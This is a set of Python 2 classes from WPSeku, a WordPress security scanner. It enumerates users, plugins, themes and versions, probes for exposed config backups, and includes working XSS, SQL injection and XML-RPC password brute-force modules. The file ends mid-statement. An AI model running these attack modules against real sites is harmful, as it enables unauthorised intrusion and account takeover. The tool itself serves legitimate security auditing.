class wplisting: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test('Checking dir listing...') dir = [ '/wp-admin', '/wp-includes', '/wp-content/uploads', '/wp-content/plugins', '/wp-content/themes' ] for i in dir: try: url = self.check.checkurl(self.url, i) resp = self.req.send(url) html = resp.read() if html and resp.getcode() == 200: if re.search('Index of', html): self.printf.plus('dir %s listing enabled under: %s' % (i, url)) else: self.printf.erro('dir %s not listing enabled' % (i)) else: self.printf.erro('dir %s not listing enabled' % (i)) except Exception as error: pass
class wpxss: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url, method, payload): self.url = url self.method = method self.payload = payload self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test("Testing XSS vulns...") print "" params = dict([x.split("=") for x in self.payload.split("&")]) param = {} db = open("data/wpxss.txt", "rb") file = [x.split("\n") for x in db] try: for item in params.items(): for x in file: param[item[0]] = item[1].replace(item[1], x[0]) enparam = urllib.urlencode(param) url = self.check.checkurl(self.url, "") resp = self.req.send(url, self.method, enparam) if re.search(x[0], resp.read()) and resp.getcode() == 200: self.printf.erro( "[%s][%s][vuln] %s" % (resp.getcode(), self.method, resp.geturl())) else: self.printf.plus( "[%s][%s][not vuln] %s" % (resp.getcode(), self.method, resp.geturl())) except Exception as error: pass
class wpusers: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) self.usersFeed = [] self.usersJson = [] self.usersAuthor = [] def wayjson(self): # Enumeration users via wp-json # https://www.exploit-db.com/exploits/41497/ try: url = self.check.checkurl(self.url, "/wp-json/wp/v2/users") self.printf.ipri(" %s" % (url), color="g") resp = self.req.send(url) if resp.getcode() == 200: html = resp.read() user = json.loads(html, "utf-8") for x in range(len(user)): self.usersJson.append(user[x]["name"]) # print self.usersJson except Exception, e: pass
class wpconfig: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test('Checking wp-config...') try: url = self.check.checkurl(self.url, '/wp-config.php') resp = self.req.send(url) html = resp.read() if html and resp.getcode() == 200: if re.search('\S+define(\S+,*)', html): self.printf.plus('wp-config available under: %s' % (url)) else: self.printf.erro('wp-config not available') else: self.printf.erro('wp-config not available') self.wpconfigsample() self.backup() except Exception as error: pass def backup(self): self.printf.test('Checking wp-config backup...') ext = [ '.php~', '.backup', '.bck', '.old', '.save', '.bak', '.copy', '.tmp', '.txt', '.zip', '.db', '.dat', '.tar.gz', '.back', '.test', '.temp', '.orig' ] for x in ext: try: url = self.check.checkurl(self.url, '/wp-config' + x) resp = self.req.send(url) if resp.read() and resp.getcode() == 200: self.printf.plus('wp-config backup available under: %s' % (url)) else: self.printf.erro('wp-config%s backup not available' % x) except Exception as error: pass def wpconfigsample(self): self.printf.test('Checking wp-config-sample...') try: url = self.check.checkurl(self.url, 'wp-config-sample.php') resp = self.req.send(url) if resp.read() and resp.getcode() == 500: self.printf.plus('wp-config-sample available under: %s' % (url)) else: self.printf.erro('wp-config-sample not available') except Exception as error: pass
class wpchangelog: check = wphttp.check() printf = wpprint.wpprint() def __init__(self,agent,proxy,redirect,url): self.url = url self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect) def run(self,theme): files = ['changelog.txt','changelog.md','CHANGELOG.md','CHANGELOG.txt'] for i in files: try: url = self.check.checkurl(self.url,'/wp-content/themes/%s/%s'%(theme,i)) resp = self.req.send(url) if resp.read() and resp.getcode() == 200: self.printf.ipri('Changelog: %s'%(url),color="g") except Exception as error: pass
class wpfpd: check = wphttp.check() printf = wpprint.wpprint() def __init__(self,agent,proxy,redirect,url): self.url = url self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect) def run(self): self.printf.test('Checking Full Path Disclosure...') try: url = self.check.checkurl(self.url,'/wp-includes/rss-functions.php') resp = self.req.send(url) if re.search('Fatal error',resp.read()): self.printf.erro('Full Path Disclosure: %s'%(url)) else: self.printf.erro('Full Path Disclosure not available') except Exception as error: pass
class wpcrossdomain: check = wphttp.check() printf = wpprint.wpprint() def __init__(self,agent,proxy,redirect,url): self.url = url self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect) def run(self): self.printf.test('Checking crossdomain...') try: url = self.check.checkurl(self.url,'crossdomain.xml') resp = self.req.send(url) if resp.read() and resp.getcode() == 200: self.printf.plus('crossdomain.xml available under: %s'%(url)) else: self.printf.erro('crossdomain.xml not available') except Exception as error: pass
class wpxmlrpc: check = wphttp.check() printf = wpprint.wpprint() def __init__(self,agent,proxy,redirect,url): self.url = url self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect) def run(self): self.printf.test("Checking xmlrpc...") try: url = self.check.checkurl(self.url,'/xmlrpc.php') resp = self.req.send(url) if resp.read() and resp.getcode() == 405: self.printf.plus('XML-RPC Interface available under: %s'%(url)) else: self.printf.erro('XML-RPC not available') except Exception as error: pass
class wpusers: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test("Enumeration usernames...") l = [] for x in range(0, 15): try: url = self.check.checkurl(self.url, '/?author=%s' % x) resp = self.req.send(url) if resp.getcode() == 200: html = resp.read() login = re.findall('/author/(.+?)/', html) l.append(login) except Exception as error: print error login_new = [] for i in l: if i not in login_new: login_new.append(i) ################## try: if login_new != []: for a in range(len(login_new)): if "%20" in login_new[a][0]: self.printf.ipri( " ID: %s | Login: %s" % (a, login_new[a][0].replace('%20', ' ')), color="g") else: self.printf.ipri(" ID: %s | Login: %s" % (a, login_new[a][0]), color="g") print "" if login_new == []: self.printf.ipri("Not found usernames", color="r") except Exception as error: self.printf.ipri("Not found usernames", color="r")
class wplicense: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self, plugin): files = ['license.txt', 'license.md', 'LICENSE.md', 'LICENSE.txt'] for i in files: try: url = self.check.checkurl( self.url, 'wp-content/plugins/%s/%s' % (plugin, i)) resp = self.req.send(url) if resp.read() and resp.getcode() == 200: self.printf.ipri('License: %s' % (url), color="g") except Exception as error: pass
class wplicense: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test("Checking license...") try: url = self.check.checkurl(self.url, '/license.txt') resp = self.req.send(url) if resp.read() and resp.getcode() == 200: self.printf.plus('license.txt available under: %s' % (url)) else: self.printf.erro('license.txt not available') except Exception as error: pass
class wpxmlrpc: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url, cookie, wordlist, user): self.url = url self.cookie = cookie self.wordlist = wordlist self.user = user self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test('Starting bruteforce login via xmlrpc...') print "" passwd = open(self.wordlist, "rb") for x in passwd: payload = ( """<methodCall><methodName>wp.getUsersBlogs</methodName><params> <param><value><string>""" + self.user + """</string></value></param> <param><value><string>""" + str(x.split('\n')[0]) + """</string></value></param></params></methodCall>""") self.printf.test("Trying Credentials: \"%s\" - \"%s\"" % (self.user, x.split('\n')[0])) try: url = self.check.checkurl(self.url, 'xmlrpc.php') resp = self.req.send(url, method="POST", payload=payload) html = resp.read() if re.search('<name>isAdmin</name><value><boolean>0</boolean>', html, re.I): self.printf.plus('Valid Credentials: \"%s\" - \"%s\"' % (self.user, x.split('\n')[0])) elif re.search( '<name>isAdmin</name><value><boolean>1</boolean>', html, re.I): self.printf.plus( 'Valid ADMIN Credentials: \"%s\" - \"%s\"' % (self.user, x.split('\n')[0])) break else: self.printf.erro('Invalid Credentials: \"%s\" - \"%s\"' % (self.user, x.split('\n')[0])) except Exception as error: pass
class wploginprotection: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test('Checking wp-login protection...') try: url = self.check.checkurl(self.url, 'wp-login.php') resp = self.req.send(url) if resp.getcode() == 200: self.printf.plus('wp-login not detect protection') elif resp.getcode() == 404: self.printf.erro('wp-login detect protection') except Exception as error: pass
class wpwaf: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test('Checking WAF...') try: url = self.check.checkurl(self.url, "") resp = self.req.send(url) html = resp.read() if re.search('/wp-content/plugins/wordfence/', html): self.printf.plus('Firewall Detection: Wordfence Security') elif re.search('/wp-content/plugins/bulletproof-security/', html): self.printf.plus('Firewall Detection: BulletProof Security') elif re.search('/wp-content/plugins/sucuri-scanner/', html): self.printf.plus('Firewall Detection: Sucuri Security') elif re.search('/wp-content/plugins/better-wp-security/', html): self.printf.plus('Firewall Detection: Better WP Security') elif re.search('/wp-content/plugins/wp-security-scan/', html): self.printf.plus( 'Firewall Detection: Acunetix WP SecurityScan') elif re.search( '/wp-content/plugins/all-in-one-wp-security-and-firewall/', html): self.printf.plus( 'Firewall Detection: All In One WP Security & Firewall') elif re.search('/wp-content/plugins/6scan-protection', html): self.printf.plus('Firewall Detection: 6Scan Security') elif re.search('cloudflare-nginx', resp.info().getheader('server'), re.I): self.printf.plus('Firewall Detection: CloudFlare') elif re.search('__cfduid', resp.info().getheader('cookie'), re.I): self.printf.plus('Firewall Detection: CloudFlare') else: self.printf.erro('No Firewall Detected') except Exception as error: pass
class wprobots: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test("Checking robots...") try: url = self.check.checkurl(self.url, '/robots.txt') resp = self.req.send(url) html = resp.read() if html and resp.getcode() == 200: self.printf.plus('robots.txt available under: %s' % (url)) print "\r\n%s\n" % (html) elif html == "": self.printf.erro('robots.txt not available') except Exception as error: pass
class wplisting: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self, plugin): files = [ "/js", "/css", "/images", "/inc", "/admin", "/src", "/widgets", "/lib", "/assets", "/includes", "/logs", "/vendor", "/core" ] for i in files: try: url = self.check.checkurl( self.url, 'wp-content/plugins/%s/%s' % (plugin, i)) resp = self.req.send(url) if re.search('Index of', resp.read()): self.printf.ipri('Listing: %s' % (url), color="g") except Exception as error: pass
class wpfpd: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self, theme): file = [ "/404.php", "/archive.php", "/author.php", "/comments.php", "/footer.php", "/functions.php", "/header.php", "/image.php", "/page.php", "/search.php", "/single.php", "/archive.php" ] for i in file: try: url = self.check.checkurl( self.url, "/wp-content/themes/%s%s" % (theme, i)) resp = self.req.send(url) if re.search('Fatal error', resp.read()): self.printf.ipri('Full Path Disclosure: %s' % (url), color="r") except Exception as error: pass
class wpversion: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, redirect=redirect, proxy=proxy) def run(self): self.printf.test('Checking wordpress version...') try: url = self.check.checkurl(self.url, 'wp-links-opml.php') resp = self.req.send(url) vers = re.findall('\S+WordPress/(\d+.\d+[.\d+]*)', resp.read()) if vers: self.printf.plus('Running WordPress version: %s' % (vers[0])) wpvuln().run(vers) except Exception as error: print error try: url = self.check.checkurl(self.url, 'feed') resp = self.req.send(url) vers = re.findall('\S+?v=(\d+.\d+[.\d+]*)', resp.read()) if vers: self.printf.plus('Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl(self.url, '/feed/atom') resp = self.req.send(url) vers = re.findall( '<generator uri="http://wordpress.org/" version="(\d+\.\d+[\.\d+]*)"', resp.read()) if vers: self.printf.plus('Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl(self.url, '/feed/rdf') resp = self.req.send(url) vers = re.findall('\S+?v=(\d+.\d+[.\d+]*)', resp.read()) if vers: self.printf.plus('Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl(self.url, '/comments/feed') resp = self.req.send(url) vers = re.findall('\S+?v=(\d+.\d+[.\d+]*)', resp.read()) if vers: self.printf.plus( 'Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl( self.url, 'readme.html') resp = self.req.send(url) vers = re.findall( '.*wordpress-logo.png" /></a>\n.*<br />.* (\d+\.\d+[\.\d+]*)\n</h1>', resp.read()) if vers: self.printf.plus( 'Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl(self.url, '') resp = self.req.send(url) vers = re.findall( '<meta name="generator" content="WordPress (\d+\.\d+[\.\d+]*)"', resp.read()) if vers: self.printf.plus( 'Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: self.printf.erro( 'Not found running WordPress version')
class wpplugin: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpchangelog = wpchangelog.wpchangelog(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wplicense = wplicense.wplicense(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wplisting = wplisting.wplisting(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpreadme = wpreadme.wpreadme(agent=agent, proxy=proxy, redirect=redirect, url=url) def run(self): self.printf.test('Enumeration plugins...') try: url = self.check.checkurl(self.url, '') resp = self.req.send(url) plugin = re.findall('/wp-content/plugins/(.+?)/', resp.read()) new = [] for i in plugin: if i not in new: new.append(i) if new != []: for c in range(len(new)): print "" self.printf.ipri('Name: %s - %s' % (new[c], self.version(new[c])), color="g") self.wpchangelog.run(new[c]) self.wplicense.run(new[c]) self.wplisting.run(new[c]) self.wpreadme.run(new[c]) wpvuln().run(new[c]) print "" else: self.printf.ipri('Not found plugins') except Exception as error: pass def version(self, plugin): try: url = self.check.checkurl(self.url, '') resp = self.req.send(url) ver = re.findall( '/wp-content/plugins/%s\S+?ver=(\d+.\d+[.\d+]*)' % (plugin), resp.read()) if len(ver) >= 2: return ver[0] elif len(ver) == 1: return ver[0] else: return None except Exception as error: pass
class WPSeku(object): """docstring for WPSeku""" r = wpcolor.wpcolor().red(1) w = wpcolor.wpcolor().white(0) y = wpcolor.wpcolor().yellow(4) e = wpcolor.wpcolor().reset() xss = False sql = False lfi = False brute = False agent = "" proxy = None redirect = True cookie = None user = None method = None query = None wordlist = None check = wphttp.check() printf = wpprint.wpprint() _ = wpall.wpall() def __init__(self, kwargs): self.kwargs = kwargs def Banner(self): print self.r + r"__ ______ ____ _ " + self.e print self.r + r"\ \ / / _ \/ ___| ___| | ___ _ " + self.e print self.r + r" \ \ /\ / /| |_) \___ \ / _ \ |/ / | | |" + self.e print self.r + r" \ V V / | __/ ___) | __/ <| |_| |" + self.e print self.r + r" \_/\_/ |_| |____/ \___|_|\_\\__,_|" + self.e print self.w + " " + self.e print self.w + "|| WPSeku - Wordpress Security Scanner " + self.e print self.w + "|| Version 0.2.1 " + self.e print self.w + "|| Momo Outaadi (M4ll0k) " + self.e print self.w + "|| %shttps://github.com/m4ll0k/WPSeku%s\n" % (self.y, self.e) def Usage(self, ext=False): path = os.path.basename(sys.argv[0]) self.Banner() print "Usage: ./%s [--target|-t] http://localhost\n" % path print "\t-t --target\tTarget URL (eg: http://localhost)" print "\t-x --xss\tTesting XSS vulns" print "\t-s --sql\tTesting SQL vulns" print "\t-l --lfi\tTesting LFI vulns" print "\t-q --query\tTestable parameters (eg: \"id=1&test=1\")" print "\t-b --brute\tBruteforce login via xmlrpc" print "\t-u --user\tSet username, default=admin" print "\t-p --proxy\tSet proxy, (host:port)" print "\t-m --method\tSet method (GET/POST)" print "\t-c --cookie\tSet cookies" print "\t-w --wordlist\tSet wordlist" print "\t-a --agent\tSet user-agent" print "\t-r --redirect\tRedirect target url, default=True" print "\t-h --help\tShow this help and exit\n" print "Examples:" print "\t%s --target http://localhost" % path print "\t%s -t http://localhost/wp-admin/post.php -m GET -q \"post=49&action=edit\" [-x,-s,-l]" % path print "\t%s --target http://localhost --brute --wordlist dict.txt" % path print "\t%s --target http://localhost --brute --user test --wordlist dict.txt\n" % path if ext == True: sys.exit() def CheckTarget(self, url): scheme = urlparse.urlsplit(url).scheme netloc = urlparse.urlsplit(url).netloc path = urlparse.urlsplit(url).path if scheme not in ['http', 'https', '']: sys.exit(self.printf.erro('Schme %s not supported' % (scheme))) if netloc == "": return "http://" + path else: return scheme + "://" + netloc + path def Main(self): if len(sys.argv) <= 2: self.Usage(True) try: opts, args = getopt.getopt( self.kwargs, "t:x=:s=:l=:b=:h=:q:u:p:m:c:w:a:r:", [ 'target=', 'xss', 'sql', 'lfi', 'query=', 'brute', 'user='******'proxy=', 'method=', 'cookie=', 'wordlist=', 'agent=', 'redirect=', 'help' ]) except getopt.error as error: pass for o, a in opts: if o in ('-t', '--target'): self.target = self.CheckTarget(a) if o in ('-x', '--xss'): self.xss = True if o in ('-s', '--sql'): self.sql = True if o in ('-l', '--lfi'): self.lfi = True if o in ('-q', '--query'): self.query = a if o in ('-b', '--brute'): self.brute = True if o in ('-u', '--user'): self.user = a if o in ('-p', '--proxy'): self.proxy = a if o in ('-m', '--method'): self.method = a if o in ('-c', '--cookie'): self.cookie = a if o in ('-w', '--wordlist'): self.wordlist = a if o in ('-a', '--agent'): self.agent = a if o in ('-r', '--redirect'): self.redirect = a if o in ('-h', '--help'): self.Usage(True) self.Banner() self.printf.plus('Target: %s' % self.target) self.printf.plus('Starting: %s\n' % (time.strftime('%d/%m/%Y %H:%M:%S'))) print self.agent if not self.agent: self.agent = 'Mozilla/5.0' if not self.proxy: self.proxy = None if not self.cookie: self.cookie = None if not self.redirect: self.redirect = False if not self.user: self.user = "******" # xss attack if self.xss == True: if not self.method: sys.exit(self.printf.erro('Method not exisits!')) if not self.query: sys.exit(self.printf.erro('Not found query')) wpxss.wpxss(self.agent, self.proxy, self.redirect, self.target, self.method, self.query).run() sys.exit() # sql attack if self.sql == True: if not self.method: sys.exit(self.printf.erro('Method not exisits!')) if not self.query: sys.exit(self.printf.erro('Not found query')) wpsql.wpsql(self.agent, self.proxy, self.redirect, self.target, self.method, self.query).run() sys.exit() # lfi attack if self.lfi == True: if not self.method: sys.exit(self.printf.erro('Method not exisits!')) if not self.query: sys.exit(self.printf.erro('Not found query')) wplfi.wplfi(self.agent, self.proxy, self.redirect, self.target, self.method, self.query).run() sys.exit() # attack bruteforce if self.brute == True: if not self.wordlist: sys.exit(self.printf.erro('Not found wordlist!')) wpxmlrpc.wpxmlrpc(self.agent, self.proxy, self.redirect, self.target, self.cookie, self.wordlist, self.user).run() sys.exit() # discovery if self.target: self._.run(self.agent, self.proxy, self.redirect, self.target)
class wpheaders: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test("Interesting headers...") print "" try: url = self.check.checkurl(self.url, '') r = self.req.send(url) if r.info().getheader('accept-charset'): print 'Accept-Charset: %s' % ( r.info().getheader('accept-charset')) if r.info().getheader('accept-encoding'): print 'Accept-Encoding: %s' % ( r.info().getheader('accept-encoding')) if r.info().getheader('accept-language'): print 'accept-language: %s' % ( r.info().getheader('accept-language')) if r.info().getheader('accept-ranges'): print 'Accept-Ranges: %s' % ( r.info().getheader('accept-ranges')) if r.info().getheader('access-control-allow-credentials'): print 'Access-Control-Allow-Credentials: %s' % ( r.info().getheader('access-control-allow-credentials')) if r.info().getheader('access-control-allow-headers'): print 'Access-Control-Allow-Headers: %s' % ( r.info().getheader('access-control-allow-headers')) if r.info().getheader('access-control-allow-methods'): print 'Access-Control-Allow-Methods: %s' % ( r.info().getheader('access-control-allow-methods')) if r.info().getheader('access-control-allow-origin'): print 'Access-Control-Allow-Origin: %s' % ( r.info().getheader('access-control-allow-origin')) if r.info().getheader('access-control-expose-headers'): print 'Access-Control-Expose-Headers: %s' % ( r.info().getheader('access-control-expose-headers')) if r.info().getheader('access-control-max-age'): print 'Access-Control-Max-Age: %s' % ( r.info().getheader('access-control-max-age')) if r.info().getheader('age'): print 'Age: %s' % (r.info().getheader('age')) if r.info().getheader('allow'): print 'Allow: %s' % (r.info().getheader('allow')) if r.info().getheader('alternates'): print 'Alternates: %s' % (r.info().getheader('alternates')) if r.info().getheader('authorization'): print 'Authorization: %s' % ( r.info().getheader('authorization')) if r.info().getheader('cache-control'): print 'Cache-Control: %s' % ( r.info().getheader('cache-control')) if r.info().getheader('connection'): print 'Connection: %s' % (r.info().getheader('connection')) if r.info().getheader('content-encoding'): print 'Content-Encoding: %s' % ( r.info().getheader('content-encoding')) if r.info().getheader('content-language'): print 'Content-Language: %s' % ( r.info().getheader('content-language')) if r.info().getheader('content-length'): print 'Content-Length: %s' % ( r.info().getheader('content-length')) if r.info().getheader('content-location'): print 'Content-Location: %s' % ( r.info().getheader('content-location')) if r.info().getheader('content-md5'): print 'Content-md5: %s' % (r.info().getheader('content-md5')) if r.info().getheader('content-range'): print 'Content-Range: %s' % ( r.info().getheader('content-range')) if r.info().getheader('content-security-policy'): print 'Content-Security-Policy: %s' % ( r.info().getheader('content-security-policy')) if r.info().getheader('content-security-policy-report-only'): print 'Content-Security-Policy-Report-Only: %s' % ( r.info().getheader('content-security-policy-report-only')) if r.info().getheader('content-type'): print 'Content-Type: %s' % (r.info().getheader('content-type')) if r.info().getheader('dasl'): print 'Dasl: %s' % (r.info().getheader('dasl')) if r.info().getheader('date'): print 'Date: %s' % (r.info().getheader('date')) if r.info().getheader('dav'): print 'Dav: %s' % r.info().getheader('dav') if r.info().getheader('etag'): print 'Etag: %s' % (r.info().getheader('etag')) if r.info().getheader('from'): print 'From: %s' % (r.info().getheader('from')) if r.info().getheader('host'): print 'Host: %s' % (r.info().getheader('host')) if r.info().getheader('keep-alive'): print 'Keep-Alive: %s' % (r.info().getheader('keep-alive')) if r.info().getheader('last-modified'): print 'Last-Modified: %s' % ( r.info().getheader('last-modified')) if r.info().getheader('location'): print 'Location: %s' % (r.info().getheader('location')) if r.info().getheader('max-forwards'): print 'Max-Forwards: %s' % (r.info().getheader('max-forwards')) if r.info().getheader('persistent-auth'): print 'Persistent-Auth: %s' % ( r.info().getheader('persistent-auth')) if r.info().getheader('pragma'): print 'Pragma: %s' % (r.info().getheader('pragma')) if r.info().getheader('proxy-authenticate'): print 'Proxy-Authenticate: %s' % ( r.info().getheader('proxy-authenticate')) if r.info().getheader('proxy-authorization'): print 'Proxy-Authorization: %s' % ( r.info().getheader('proxy-authorization')) if r.info().getheader('proxy-connection'): print 'Proxy-Connection: %s' % ( r.info().getheader('proxy-connection')) if r.info().getheader('public'): print 'Public: %s' % (r.info().getheader('public')) if r.info().getheader('range'): print 'Range: %s' % (r.info().getheader('range')) if r.info().getheader('referer'): print 'Referer: %s' % (r.info().getheader('referer')) if r.info().getheader('server'): print 'Server: %s' % (r.info().getheader('server')) if r.info().getheader('set-cookie'): print 'Set-Cookie: %s' % (r.info().getheader('set-cookie')) if r.info().getheader('status'): print 'Status: %s' % (r.info().getheader('status')) if r.info().getheader('strict-transport-security'): print 'Strict-Transport-Security: %s' % ( r.info().getheader('strict-transport-security')) if r.info().getheader('transfer-encoding'): print 'Transfer-Encoding: %s' % ( r.info().getheader('transfer-encoding')) if r.info().getheader('upgrade'): print 'Upgrade: %s' % (r.info().getheader('upgrade')) if r.info().getheader('vary'): print 'Vary: %s' % (r.info().getheader('vary')) if r.info().getheader('via'): print 'Via: %s' % (r.info().getheader('via')) if r.info().getheader('warning'): print 'Warning: %s' % (r.info().getheader('warning')) if r.info().getheader('www-authenticate'): print 'www-Authenticate: %s' % ( r.info().getheader('www-authenticate')) if r.info().getheader('x-content-security-policy'): print 'X-Content-Security-Policy: %s' % ( r.info().getheader('x-content-security-policy')) if r.info().getheader('x-content-type-options'): print 'X-Content-Type-Options: %s' % ( r.info().getheader('x-content-type-options')) if r.info().getheader('x-frame-options'): print 'X-Frame-Options: %s' % ( r.info().getheader('x-frame-options')) if r.info().getheader('x-id'): print 'X-Id: %s' % (r.info().getheader('x-id')) if r.info().getheader('x-mod-pagespeed'): print 'X-Mod-Pagespeed: %s' % ( r.info().getheader('x-mod-pagespeed')) if r.info().getheader('x-pad'): print 'X-Pad: %s' % (r.info().getheader('x-pad')) if r.info().getheader('x-page-speed'): print 'X-Page-Speed: %s' % (r.info().getheader('x-page-speed')) if r.info().getheader('x-permitted-cross-domain-policies'): print 'X-Permitted-Cross-Domain-Policies: %s' % ( r.info().getheader('x-permitted-cross-domain-policies')) if r.info().getheader('x-pingback'): print 'X-Pingback: %s' % (r.info().getheader('x-pingback')) if r.info().getheader('x-powered-by'): print 'X-Powered-By: %s' % (r.info().getheader('x-powered-by')) if r.info().getheader('x-robots-tag'): print 'X-Robots-Tag: %s' % (r.info().getheader('x-robots-tag')) if r.info().getheader('x-ua-compatible'): print 'X-UA-Compatible: %s' % ( r.info().getheader('x-ua-compatible')) if r.info().getheader('x-varnish'): print 'X-Varnish: %s' % (r.info().getheader('x-varnish')) if r.info().getheader('x-xss-protection'): print 'X-XSS-Protection: %s' % ( r.info().getheader('x-xss-protection')) except Exception as error: pass print ""
class wptheme: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpch = wpchangelog.wpchangelog(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpfpd = wpfpd.wpfpd(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpli = wplicense.wplicense(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wplis = wplisting.wplisting(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wprea = wpreadme.wpreadme(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpst = wpstyle.wpstyle(agent=agent, proxy=proxy, redirect=redirect, url=url) def run(self): self.printf.test('Enumeration themes...') try: url = self.check.checkurl(self.url, '') resp = self.req.send(url) theme = re.findall('/wp-content/themes/(.+?)/', resp.read()) new = [] for i in theme: if i not in new: new.append(i) if new != []: for c in range(len(new)): print "" self.printf.ipri('Name: %s' % (new[c]), color="g") self.info(new[c]) self.wpst.run(new[c]) self.wpch.run(new[c]) self.wpfpd.run(new[c]) self.wpli.run(new[c]) self.wplis.run(new[c]) self.wprea.run(new[c]) wpvuln().run(new[c]) print "" else: self.printf.ipri('Not found themes', color="g") except Exception as error: pass def info(self, theme): try: url = self.check.checkurl( self.url, "/wp-content/themes/%s/%s" % (theme, "style.css")) resp = self.req.send(url) html = resp.read() self.printf.ipri('Theme Name: %s' % (re.findall("Theme Name: (\w+)", html)[0]), color="g") self.printf.ipri('Theme URL: %s' % (re.findall("Theme URI: (\S+)", html)[0]), color="g") self.printf.ipri('Author: %s' % (re.findall("Author: (\S+)", html)[0]), color="g") self.printf.ipri('Author URL: %s' % (re.findall("Author URI: (\S+)", html)[0]), color="g") self.printf.ipri( 'Version: %s' % (re.findall("Version: (\d+.\d+[.\d+]*)", html)[0]), color="g") except Exception as error: pass
class wpsql: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url, method, payload): self.url = url self.method = method self.payload = payload self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def dberror(self, data): if re.search("You have an error in your SQL syntax", data): return "MySQL Injection" if re.search("supplied argument is not a valid MySQL", data): return "MySQL Injection" if re.search("Microsoft ODBC Microsoft Access Driver", data): return "Access-Based SQL Injection" if re.search( 'Microsoft OLE DB Provider for ODBC Drivers</font> <font size="2" face="Arial">error', data): return "MSSQL-Based Injection" if re.search("Microsoft OLE DB Provider for ODBC Drivers", data): return "MSSQL-Based Injection" if re.search("java.sql.SQLException: Syntax error or access violation", data): return "Java.SQL Injection" if re.search("PostgreSQL query failed: ERROR: parser:", data): return "PostgreSQL Injection" if re.search("XPathException", data): return "XPath Injection" if re.search( "supplied argument is not a valid ldap", data) or re.search( "javax.naming.NameNotFoundException", data): return "LDAP Injection" if re.search("DB2 SQL error", data): return "DB2 Injection" if re.search("Dynamic SQL Error", data): return "Interbase Injection" if re.search("Sybase message:", data): return "Sybase Injection" oracle = re.search('ORA-[0-9]', data) if oracle != None: return "Oracle Injection" + " " + oracle.group(0) return "" def run(self): self.printf.test("Testing SQL vulns...") print "" params = dict([x.split("=") for x in self.payload.split("&")]) param = {} db = open("data/wpsql.txt", "rb") file = [x.split("\n") for x in db] try: for item in params.items(): for x in file: param[item[0]] = item[1].replace(item[1], x[0]) enparam = urllib.urlencode(param) url = self.check.checkurl(self.url, "") resp = self.req.send(url, self.method, enparam) data = self.dberror(resp.read()) if data != "": self.printf.erro( "[%s][%s][%s] %s" % (resp.getcode(), self.method, data, resp.geturl())) else: self.printf.plus( "[%s][%s][not vuln] %s" % 